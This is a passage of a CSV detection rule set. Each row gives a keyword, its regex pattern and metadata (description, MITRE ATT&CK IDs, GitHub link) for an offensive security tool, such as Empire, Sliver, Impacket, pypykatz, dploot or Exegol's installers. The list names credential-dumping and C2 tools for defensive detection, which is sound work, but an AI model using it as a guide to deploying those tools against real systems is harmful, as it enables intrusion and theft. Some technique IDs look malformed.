We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","786","142","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z" "*INSERT INTO LDAPHUNTERFINDINGS *",".{0,1000}INSERT\sINTO\sLDAPHUNTERFINDINGS\s.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*insert_top_100_passwords_1_G*",".{0,1000}insert_top_100_passwords_1_G.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*InsidePro-PasswordsPro.rule*",".{0,1000}InsidePro\-PasswordsPro\.rule.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*InspectAssembly.csproj*",".{0,1000}InspectAssembly\.csproj.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 
"*InspectAssembly.exe*",".{0,1000}InspectAssembly\.exe.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*install powershell-empire*",".{0,1000}install\s\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*install * roadrecon*",".{0,1000}install\s.{0,1000}\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD 
tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*install amass",".{0,1000}install\samass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping. recursive brute forcing. crawling of web archives. name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","N/A","Information Gathering","https://github.com/OWASP/Amass","1","0","N/A","N/A","10","11204","1816","2024-04-13T11:51:46Z","2018-07-10T16:05:08Z" "*install bloodhound*",".{0,1000}install\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*install c2tc-domaininfo*",".{0,1000}install\sc2tc\-domaininfo.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*install cdn-proxy*",".{0,1000}install\scdn\-proxy.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - 
TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*install certsync*",".{0,1000}install\scertsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*install coercer*",".{0,1000}install\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*--install -d kali-linux*",".{0,1000}\-\-install\s\-d\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*install dploot*",".{0,1000}install\sdploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*install gobuster*",".{0,1000}install\sgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*install h8mail*",".{0,1000}install\sh8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*install hakrawler*",".{0,1000}install\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*install hping3*",".{0,1000}install\shping3.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & 
Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*install hydra-gtk*",".{0,1000}install\shydra\-gtk.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*install impacket*",".{0,1000}install\simpacket.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*install Jira-Lens*",".{0,1000}install\sJira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 
T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*install macchanger*",".{0,1000}install\smacchanger.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*install p0f*",".{0,1000}install\sp0f.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*install proxychains*",".{0,1000}install\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*install pypykatz*",".{0,1000}install\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*install s3scanner*",".{0,1000}install\ss3scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*install samdump2*",".{0,1000}install\ssamdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*install tor deb.torproject.org-keyring*",".{0,1000}install\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*install udmp_parser*",".{0,1000}install\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","172","24","2024-02-25T13:18:10Z","2022-01-30T18:56:21Z" "*install wapiti*",".{0,1000}install\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*install_aclpwn*",".{0,1000}install_aclpwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ad_apt_tools*",".{0,1000}install_ad_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_adidnsdump*",".{0,1000}install_adidnsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of 
offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_amber*",".{0,1000}install_amber.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound*",".{0,1000}install_bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-import*",".{0,1000}install_bloodhound\-import.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-py*",".{0,1000}install_bloodhound\-py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-quickwin*",".{0,1000}install_bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_certipy*",".{0,1000}install_certipy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_certsync*",".{0,1000}install_certsync.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_coercer*",".{0,1000}install_coercer.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*install_crackhound*",".{0,1000}install_crackhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_cracking_apt_tools*",".{0,1000}install_cracking_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_crackmapexec*",".{0,1000}install_crackmapexec.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_cypheroth*",".{0,1000}install_cypheroth.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_darkarmour*",".{0,1000}install_darkarmour.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment 
with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_dfscoerce*",".{0,1000}install_dfscoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_donpapi*",".{0,1000}install_donpapi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_enum4linux-ng*",".{0,1000}install_enum4linux\-ng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_enyx*",".{0,1000}install_enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_evilwinrm*",".{0,1000}install_evilwinrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_finduncommonshares*",".{0,1000}install_finduncommonshares.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_gmsadumper*",".{0,1000}install_gmsadumper.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_goldencopy*",".{0,1000}install_goldencopy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" 
"*install_gosecretsdump*",".{0,1000}install_gosecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_gpp-decrypt*",".{0,1000}install_gpp\-decrypt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_hashonymize*",".{0,1000}install_hashonymize.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_impacket*",".{0,1000}install_impacket.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_keepwn*",".{0,1000}install_keepwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of 
